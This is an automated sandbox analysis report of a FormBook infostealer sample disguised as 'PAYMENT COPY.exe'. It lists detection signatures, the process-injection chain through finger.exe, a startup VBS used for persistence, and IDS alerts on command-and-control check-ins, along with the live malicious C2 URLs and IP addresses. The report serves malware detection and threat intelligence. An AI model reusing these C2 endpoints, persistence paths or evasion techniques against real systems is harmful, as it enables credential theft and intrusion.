Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
PAYMENT COPY.exe

Overview

General Information

Sample name:PAYMENT COPY.exe
Analysis ID:1635000
MD5:351c6c8652cfb4bf7636bcd23e28b903
SHA1:a585ece22efe9a6b5e77ca4cb5fc7c3c61bd3e48
SHA256:f1dc888c0eb3365e86f4ea915cd13a3357588d98b204ac6036fb7944f723bd8e
Tags:exeFormbookuser-lowmal3
Infos:

Detection

FormBook
Score:100
Range:0 - 100
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for URL or domain
Antivirus detection for dropped file
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Sigma detected: Drops script at startup location
Suricata IDS alerts for network traffic
Yara detected AntiVM3
Yara detected FormBook
.NET source code contains potential unpacker
Drops VBS files to the startup folder
Found direct / indirect Syscall (likely to bypass EDR)
Initial sample is a PE file and has a suspicious name
Injects a PE file into a foreign processes
Joe Sandbox ML detected suspicious sample
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Performs DNS queries to domains with low reputation
Queues an APC in another process (thread injection)
Sample has a suspicious name (potential lure to open the executable)
Sigma detected: WScript or CScript Dropper
Switches to a custom stack to bypass stack traces
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Windows Scripting host queries suspicious COM object (likely to drop second stage)
Yara detected Costura Assembly Loader
Allocates memory with a write watch (potentially for evading sandboxes)
Checks if the current process is being debugged
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to read the PEB
Creates a process in suspended mode (likely to inject code)
Creates a start menu entry (Start Menu\Programs\Startup)
Detected non-DNS traffic on DNS port
Detected potential crypto function
Drops PE files
Enables debug privileges
Found WSH timer for Javascript or VBS script (likely evasive script)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found inlined nop instructions (likely shell or obfuscated code)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Stores files to the Windows start menu directory
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)

Classification

Process Tree

  • System is w10x64
  • PAYMENT COPY.exe (PID: 7040 cmdline: "C:\Users\user\Desktop\PAYMENT COPY.exe" MD5: 351C6C8652CFB4BF7636BCD23E28B903)
    • PAYMENT COPY.exe (PID: 6200 cmdline: "C:\Users\user\Desktop\PAYMENT COPY.exe" MD5: 351C6C8652CFB4BF7636BCD23E28B903)
      • BMYdhGJqo1.exe (PID: 3296 cmdline: "C:\Program Files (x86)\WYbaSkuKKrHGWltywOsHLlcjIrqbXkAizUAFfQKYlccE\43MttfTFQnpMN.exe" MD5: 9C98D1A23EFAF1B156A130CEA7D2EE3A)
        • finger.exe (PID: 6632 cmdline: "C:\Windows\SysWOW64\finger.exe" MD5: C586D06BF5D5B3E6E9E3289F6AA8225E)
          • BMYdhGJqo1.exe (PID: 4960 cmdline: "C:\Program Files (x86)\WYbaSkuKKrHGWltywOsHLlcjIrqbXkAizUAFfQKYlccE\JSEAPaWaZQb6hd.exe" MD5: 9C98D1A23EFAF1B156A130CEA7D2EE3A)
          • firefox.exe (PID: 6768 cmdline: "C:\Program Files\Mozilla Firefox\Firefox.exe" MD5: C86B1BE9ED6496FE0E0CBE73F81D8045)
  • wscript.exe (PID: 6772 cmdline: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\HashSize.vbs" MD5: A47CBE969EA935BDD3AB568BB126BC80)
    • HashSize.exe (PID: 6792 cmdline: "C:\Users\user\AppData\Roaming\HashSize.exe" MD5: 351C6C8652CFB4BF7636BCD23E28B903)
      • HashSize.exe (PID: 7104 cmdline: "C:\Users\user\AppData\Roaming\HashSize.exe" MD5: 351C6C8652CFB4BF7636BCD23E28B903)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
Formbook, FormboFormBook contains a unique crypter RunPE that has unique behavioral patterns subject to detection. It was initially called "Babushka Crypter" by Insidemalware.
  • SWEED
  • Cobalt
https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook

Malware Configuration

No configs have been found

Yara Signatures

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000000.00000002.1054007496.0000000005BD0000.00000004.08000000.00040000.00000000.sdmpJoeSecurity_CosturaAssemblyLoaderYara detected Costura Assembly LoaderJoe Security
    00000004.00000002.3348154175.0000000002BA0000.00000040.80000000.00040000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
      00000004.00000002.3352771061.0000000003190000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
        00000004.00000002.3351872954.0000000003140000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
          00000006.00000002.1325090938.000000000381D000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_CosturaAssemblyLoaderYara detected Costura Assembly LoaderJoe Security
            Click to see the 12 entries

            Unpacked PEs

            SourceRuleDescriptionAuthorStrings
            6.2.HashSize.exe.38ec6f0.4.raw.unpackJoeSecurity_CosturaAssemblyLoaderYara detected Costura Assembly LoaderJoe Security
              1.2.PAYMENT COPY.exe.400000.0.raw.unpackJoeSecurity_FormBook_1Yara detected FormBookJoe Security
                6.2.HashSize.exe.3a449c0.5.unpackJoeSecurity_CosturaAssemblyLoaderYara detected Costura Assembly LoaderJoe Security
                  6.2.HashSize.exe.39451d1.6.raw.unpackJoeSecurity_CosturaAssemblyLoaderYara detected Costura Assembly LoaderJoe Security
                    0.2.PAYMENT COPY.exe.5bd0000.4.unpackJoeSecurity_CosturaAssemblyLoaderYara detected Costura Assembly LoaderJoe Security
                      Click to see the 4 entries

                      Sigma Signatures

                      System Summary

                      barindex
                      Sigma detected: WScript or CScript Dropper
                      Source: Process startedAuthor: Margaritis Dimitrios (idea), Florian Roth (Nextron Systems), oscd.community: Data: Command: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\HashSize.vbs" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\HashSize.vbs" , CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 4040, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\HashSize.vbs" , ProcessId: 6772, ProcessName: wscript.exe
                      Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
                      Source: Process startedAuthor: Michael Haag: Data: Command: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\HashSize.vbs" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\HashSize.vbs" , CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 4040, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\HashSize.vbs" , ProcessId: 6772, ProcessName: wscript.exe

                      Data Obfuscation

                      barindex
                      Sigma detected: Drops script at startup location
                      Source: File createdAuthor: Joe Security: Data: EventID: 11, Image: C:\Users\user\Desktop\PAYMENT COPY.exe, ProcessId: 7040, TargetFilename: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\HashSize.vbs

                      Suricata Signatures

                      TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                      2025-03-11T09:10:34.306504+010028554651A Network Trojan was detected192.168.2.958075104.21.54.11280TCP
                      2025-03-11T09:10:58.790504+010028554651A Network Trojan was detected192.168.2.958081103.42.144.2480TCP
                      2025-03-11T09:11:11.973577+010028554651A Network Trojan was detected192.168.2.95808513.248.169.4880TCP
                      2025-03-11T09:11:25.155613+010028554651A Network Trojan was detected192.168.2.95808913.248.169.4880TCP
                      2025-03-11T09:11:46.401727+010028554651A Network Trojan was detected192.168.2.95809313.248.169.4880TCP
                      2025-03-11T09:11:59.730006+010028554651A Network Trojan was detected192.168.2.958097209.74.77.23080TCP
                      2025-03-11T09:12:14.058438+010028554651A Network Trojan was detected192.168.2.958101134.122.135.5480TCP
                      2025-03-11T09:12:27.459225+010028554651A Network Trojan was detected192.168.2.95810513.248.169.4880TCP
                      2025-03-11T09:12:48.694614+010028554651A Network Trojan was detected192.168.2.95810913.248.169.4880TCP
                      2025-03-11T09:13:04.172997+010028554651A Network Trojan was detected192.168.2.958113111.119.219.19580TCP
                      2025-03-11T09:13:17.471979+010028554651A Network Trojan was detected192.168.2.958117172.67.148.16380TCP
                      2025-03-11T09:13:33.167575+010028554651A Network Trojan was detected192.168.2.952481157.112.187.7780TCP
                      2025-03-11T09:13:47.247495+010028554651A Network Trojan was detected192.168.2.9524858.222.228.10780TCP
                      2025-03-11T09:14:01.292516+010028554651A Network Trojan was detected192.168.2.9524893.33.130.19080TCP
                      TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                      2025-03-11T09:10:51.117706+010028554641A Network Trojan was detected192.168.2.958078103.42.144.2480TCP
                      2025-03-11T09:10:53.659345+010028554641A Network Trojan was detected192.168.2.958079103.42.144.2480TCP
                      2025-03-11T09:10:56.339422+010028554641A Network Trojan was detected192.168.2.958080103.42.144.2480TCP
                      2025-03-11T09:11:04.285638+010028554641A Network Trojan was detected192.168.2.95808213.248.169.4880TCP
                      2025-03-11T09:11:07.908819+010028554641A Network Trojan was detected192.168.2.95808313.248.169.4880TCP
                      2025-03-11T09:11:09.406319+010028554641A Network Trojan was detected192.168.2.95808413.248.169.4880TCP
                      2025-03-11T09:11:18.549512+010028554641A Network Trojan was detected192.168.2.95808613.248.169.4880TCP
                      2025-03-11T09:11:20.043268+010028554641A Network Trojan was detected192.168.2.95808713.248.169.4880TCP
                      2025-03-11T09:11:22.583265+010028554641A Network Trojan was detected192.168.2.95808813.248.169.4880TCP
                      2025-03-11T09:11:38.750241+010028554641A Network Trojan was detected192.168.2.95809013.248.169.4880TCP
                      2025-03-11T09:11:42.362224+010028554641A Network Trojan was detected192.168.2.95809113.248.169.4880TCP
                      2025-03-11T09:11:43.852321+010028554641A Network Trojan was detected192.168.2.95809213.248.169.4880TCP
                      2025-03-11T09:11:52.046841+010028554641A Network Trojan was detected192.168.2.958094209.74.77.23080TCP
                      2025-03-11T09:11:54.611122+010028554641A Network Trojan was detected192.168.2.958095209.74.77.23080TCP
                      2025-03-11T09:11:57.165643+010028554641A Network Trojan was detected192.168.2.958096209.74.77.23080TCP
                      2025-03-11T09:12:06.310634+010028554641A Network Trojan was detected192.168.2.958098134.122.135.5480TCP
                      2025-03-11T09:12:08.856182+010028554641A Network Trojan was detected192.168.2.958099134.122.135.5480TCP
                      2025-03-11T09:12:11.480449+010028554641A Network Trojan was detected192.168.2.958100134.122.135.5480TCP
                      2025-03-11T09:12:19.565524+010028554641A Network Trojan was detected192.168.2.95810213.248.169.4880TCP
                      2025-03-11T09:12:22.143945+010028554641A Network Trojan was detected192.168.2.95810313.248.169.4880TCP
                      2025-03-11T09:12:25.940215+010028554641A Network Trojan was detected192.168.2.95810413.248.169.4880TCP
                      2025-03-11T09:12:41.022183+010028554641A Network Trojan was detected192.168.2.95810613.248.169.4880TCP
                      2025-03-11T09:12:43.575959+010028554641A Network Trojan was detected192.168.2.95810713.248.169.4880TCP
                      2025-03-11T09:12:46.132978+010028554641A Network Trojan was detected192.168.2.95810813.248.169.4880TCP
                      2025-03-11T09:12:55.924965+010028554641A Network Trojan was detected192.168.2.958110111.119.219.19580TCP
                      2025-03-11T09:12:58.471962+010028554641A Network Trojan was detected192.168.2.958111111.119.219.19580TCP
                      2025-03-11T09:13:01.018850+010028554641A Network Trojan was detected192.168.2.958112111.119.219.19580TCP
                      2025-03-11T09:13:09.822243+010028554641A Network Trojan was detected192.168.2.958114172.67.148.16380TCP
                      2025-03-11T09:13:12.364604+010028554641A Network Trojan was detected192.168.2.958115172.67.148.16380TCP
                      2025-03-11T09:13:14.930544+010028554641A Network Trojan was detected192.168.2.958116172.67.148.16380TCP
                      2025-03-11T09:13:25.515765+010028554641A Network Trojan was detected192.168.2.952478157.112.187.7780TCP
                      2025-03-11T09:13:28.091044+010028554641A Network Trojan was detected192.168.2.952479157.112.187.7780TCP
                      2025-03-11T09:13:30.616982+010028554641A Network Trojan was detected192.168.2.952480157.112.187.7780TCP
                      2025-03-11T09:13:39.577450+010028554641A Network Trojan was detected192.168.2.9524828.222.228.10780TCP
                      2025-03-11T09:13:42.100738+010028554641A Network Trojan was detected192.168.2.9524838.222.228.10780TCP
                      2025-03-11T09:13:44.648677+010028554641A Network Trojan was detected192.168.2.9524848.222.228.10780TCP
                      2025-03-11T09:13:52.751595+010028554641A Network Trojan was detected192.168.2.9524863.33.130.19080TCP
                      2025-03-11T09:13:55.334189+010028554641A Network Trojan was detected192.168.2.9524873.33.130.19080TCP
                      2025-03-11T09:13:57.868770+010028554641A Network Trojan was detected192.168.2.9524883.33.130.19080TCP

                      Joe Sandbox Signatures

                      Click to jump to signature section

                      Show All Signature Results

                      AV Detection

                      barindex
                      Antivirus / Scanner detection for submitted sample
                      Source: PAYMENT COPY.exeAvira: detected
                      Antivirus detection for URL or domain
                      Source: http://www.warc.tech/hxn2/?SxYDlTI=ZV/imptMlgE5kVt692kkoOOnpYQNqGQCFmm/TGgbqnHG1mgu4lPPJ2KHb3Eys5m88oXnT1AcDhAihVQlrO8FE1FC2KR6ZjObRyGnHzUzw9P3InsxcQ==&r2Q4K=X6iHrToHPpvPuDLAvira URL Cloud: Label: malware
                      Source: http://www.warc.tech/hxn2/Avira URL Cloud: Label: malware
                      Source: http://www.blogkart4u.xyz/36cg/?SxYDlTI=c6lcAlso4cwdWdj8OmW47AtI274xiSR94bq7w+xrmdROEAiOB56qTuKvZNoCgSLBfC/6u7yUdjQUAHkJ36WqywahPdu8dbqHF6CFfcf9pvxXrPYJYw==&r2Q4K=X6iHrToHPpvPuDLAvira URL Cloud: Label: malware
                      Source: http://www.quo1ybjmkhdqljoz.top/ynw5/Avira URL Cloud: Label: malware
                      Source: http://www.blogkart4u.xyz/36cg/Avira URL Cloud: Label: malware
                      Source: http://www.2y0uoqwoohvdf5vd.top/qkhv/Avira URL Cloud: Label: malware
                      Source: http://www.2y0uoqwoohvdf5vd.top/qkhv/?SxYDlTI=i51Ixu4M5LOvjs5atst6QhQmAxFvlGpFEg8Yva/DYuN1L4sxQPD0gcYXROip4eIGKLRWO2x5MCzKIlk6eYaznVU8x6VfWmgC4v2krpA400j5pgNyuA==&r2Q4K=X6iHrToHPpvPuDLAvira URL Cloud: Label: malware
                      Antivirus detection for dropped file
                      Source: C:\Users\user\AppData\Roaming\HashSize.exeAvira: detection malicious, Label: HEUR/AGEN.1363658
                      Multi AV Scanner detection for dropped file
                      Source: C:\Users\user\AppData\Roaming\HashSize.exeReversingLabs: Detection: 39%
                      Multi AV Scanner detection for submitted file
                      Source: PAYMENT COPY.exeVirustotal: Detection: 50%Perma Link
                      Source: PAYMENT COPY.exeReversingLabs: Detection: 39%
                      Yara detected FormBook
                      Source: Yara matchFile source: 1.2.PAYMENT COPY.exe.400000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 1.2.PAYMENT COPY.exe.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 00000004.00000002.3348154175.0000000002BA0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000004.00000002.3352771061.0000000003190000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000004.00000002.3351872954.0000000003140000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000001.00000002.1159249310.0000000000F40000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000002.3351350564.0000000003320000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000001.00000002.1158626557.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000008.00000002.3351843666.0000000002610000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000001.00000002.1162118891.0000000001CF0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                      Joe Sandbox ML detected suspicious sample
                      Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
                      Source: PAYMENT COPY.exeStatic PE information: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
                      Source: PAYMENT COPY.exeStatic PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                      Source: Binary string: finger.pdb source: PAYMENT COPY.exe, 00000001.00000002.1159114036.0000000000B48000.00000004.00000020.00020000.00000000.sdmp, BMYdhGJqo1.exe, 00000003.00000002.3350106221.0000000000DDE000.00000004.00000020.00020000.00000000.sdmp
                      Source: Binary string: C:\Users\dahall\Documents\GitHubRepos\TaskScheduler\TaskService\obj\Release\net40\Microsoft.Win32.TaskScheduler.pdbSHA256e source: PAYMENT COPY.exe, 00000000.00000002.1054440794.0000000005D60000.00000004.08000000.00040000.00000000.sdmp, HashSize.exe, 00000006.00000002.1325090938.0000000003B29000.00000004.00000800.00020000.00000000.sdmp, HashSize.exe, 00000006.00000002.1325090938.0000000003A44000.00000004.00000800.00020000.00000000.sdmp
                      Source: Binary string: wntdll.pdbUGP source: PAYMENT COPY.exe, 00000001.00000002.1159408870.0000000000FA0000.00000040.00001000.00020000.00000000.sdmp, finger.exe, 00000004.00000003.1164033502.00000000033BC000.00000004.00000020.00020000.00000000.sdmp, finger.exe, 00000004.00000002.3353245951.000000000370E000.00000040.00001000.00020000.00000000.sdmp, finger.exe, 00000004.00000002.3353245951.0000000003570000.00000040.00001000.00020000.00000000.sdmp, finger.exe, 00000004.00000003.1159233310.000000000320D000.00000004.00000020.00020000.00000000.sdmp
                      Source: Binary string: C:\Users\dahall\Documents\GitHubRepos\TaskScheduler\TaskService\obj\Release\net40\Microsoft.Win32.TaskScheduler.pdb source: PAYMENT COPY.exe, 00000000.00000002.1054440794.0000000005D60000.00000004.08000000.00040000.00000000.sdmp, HashSize.exe, 00000006.00000002.1325090938.0000000003B29000.00000004.00000800.00020000.00000000.sdmp, HashSize.exe, 00000006.00000002.1325090938.0000000003A44000.00000004.00000800.00020000.00000000.sdmp
                      Source: Binary string: wntdll.pdb source: PAYMENT COPY.exe, PAYMENT COPY.exe, 00000001.00000002.1159408870.0000000000FA0000.00000040.00001000.00020000.00000000.sdmp, finger.exe, finger.exe, 00000004.00000003.1164033502.00000000033BC000.00000004.00000020.00020000.00000000.sdmp, finger.exe, 00000004.00000002.3353245951.000000000370E000.00000040.00001000.00020000.00000000.sdmp, finger.exe, 00000004.00000002.3353245951.0000000003570000.00000040.00001000.00020000.00000000.sdmp, finger.exe, 00000004.00000003.1159233310.000000000320D000.00000004.00000020.00020000.00000000.sdmp
                      Source: Binary string: protobuf-net.pdbSHA256}Lq source: PAYMENT COPY.exe, 00000000.00000002.1054326763.0000000005D10000.00000004.08000000.00040000.00000000.sdmp, HashSize.exe, 00000006.00000002.1325090938.0000000003701000.00000004.00000800.00020000.00000000.sdmp, HashSize.exe, 00000006.00000002.1325090938.0000000003688000.00000004.00000800.00020000.00000000.sdmp
                      Source: Binary string: protobuf-net.pdb source: PAYMENT COPY.exe, 00000000.00000002.1054326763.0000000005D10000.00000004.08000000.00040000.00000000.sdmp, HashSize.exe, 00000006.00000002.1325090938.0000000003701000.00000004.00000800.00020000.00000000.sdmp, HashSize.exe, 00000006.00000002.1325090938.0000000003688000.00000004.00000800.00020000.00000000.sdmp
                      Source: Binary string: C:\Work\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: BMYdhGJqo1.exe, 00000003.00000000.1079377256.000000000070F000.00000002.00000001.01000000.00000007.sdmp, BMYdhGJqo1.exe, 00000008.00000000.1229141542.000000000070F000.00000002.00000001.01000000.00000007.sdmp
                      Source: Binary string: finger.pdbGCTL source: PAYMENT COPY.exe, 00000001.00000002.1159114036.0000000000B48000.00000004.00000020.00020000.00000000.sdmp, BMYdhGJqo1.exe, 00000003.00000002.3350106221.0000000000DDE000.00000004.00000020.00020000.00000000.sdmp
                      Source: C:\Windows\SysWOW64\finger.exeCode function: 4_2_02BBCB70 FindFirstFileW,FindNextFileW,FindClose,4_2_02BBCB70
                      Source: C:\Windows\System32\wscript.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Jump to behavior
                      Source: C:\Windows\System32\wscript.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Jump to behavior
                      Source: C:\Windows\System32\wscript.exeFile opened: C:\Users\user\AppData\Jump to behavior
                      Source: C:\Windows\System32\wscript.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Jump to behavior
                      Source: C:\Windows\System32\wscript.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Jump to behavior
                      Source: C:\Windows\System32\wscript.exeFile opened: C:\Users\user\Jump to behavior
                      Source: C:\Windows\SysWOW64\finger.exeCode function: 4x nop then xor eax, eax4_2_02BA9E40
                      Source: C:\Windows\SysWOW64\finger.exeCode function: 4x nop then pop edi4_2_02BAE6E6

                      Networking

                      barindex
                      Suricata IDS alerts for network traffic
                      Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.9:58087 -> 13.248.169.48:80
                      Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.9:58113 -> 111.119.219.195:80
                      Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.9:58115 -> 172.67.148.163:80
                      Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.9:58098 -> 134.122.135.54:80
                      Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.9:58084 -> 13.248.169.48:80
                      Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.9:58111 -> 111.119.219.195:80
                      Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.9:58116 -> 172.67.148.163:80
                      Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.9:58078 -> 103.42.144.24:80
                      Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.9:58080 -> 103.42.144.24:80
                      Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.9:58088 -> 13.248.169.48:80
                      Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.9:58086 -> 13.248.169.48:80
                      Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.9:58090 -> 13.248.169.48:80
                      Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.9:58092 -> 13.248.169.48:80
                      Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.9:58110 -> 111.119.219.195:80
                      Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.9:58100 -> 134.122.135.54:80
                      Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.9:58105 -> 13.248.169.48:80
                      Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.9:58104 -> 13.248.169.48:80
                      Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.9:52487 -> 3.33.130.190:80
                      Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.9:58085 -> 13.248.169.48:80
                      Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.9:58075 -> 104.21.54.112:80
                      Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.9:58089 -> 13.248.169.48:80
                      Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.9:52478 -> 157.112.187.77:80
                      Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.9:52485 -> 8.222.228.107:80
                      Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.9:58094 -> 209.74.77.230:80
                      Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.9:58099 -> 134.122.135.54:80
                      Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.9:52479 -> 157.112.187.77:80
                      Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.9:58095 -> 209.74.77.230:80
                      Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.9:58079 -> 103.42.144.24:80
                      Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.9:58083 -> 13.248.169.48:80
                      Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.9:58109 -> 13.248.169.48:80
                      Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.9:58102 -> 13.248.169.48:80
                      Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.9:58114 -> 172.67.148.163:80
                      Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.9:58093 -> 13.248.169.48:80
                      Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.9:58107 -> 13.248.169.48:80
                      Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.9:58096 -> 209.74.77.230:80
                      Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.9:58082 -> 13.248.169.48:80
                      Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.9:52484 -> 8.222.228.107:80
                      Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.9:58103 -> 13.248.169.48:80
                      Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.9:58081 -> 103.42.144.24:80
                      Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.9:58097 -> 209.74.77.230:80
                      Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.9:52488 -> 3.33.130.190:80
                      Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.9:52489 -> 3.33.130.190:80
                      Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.9:52482 -> 8.222.228.107:80
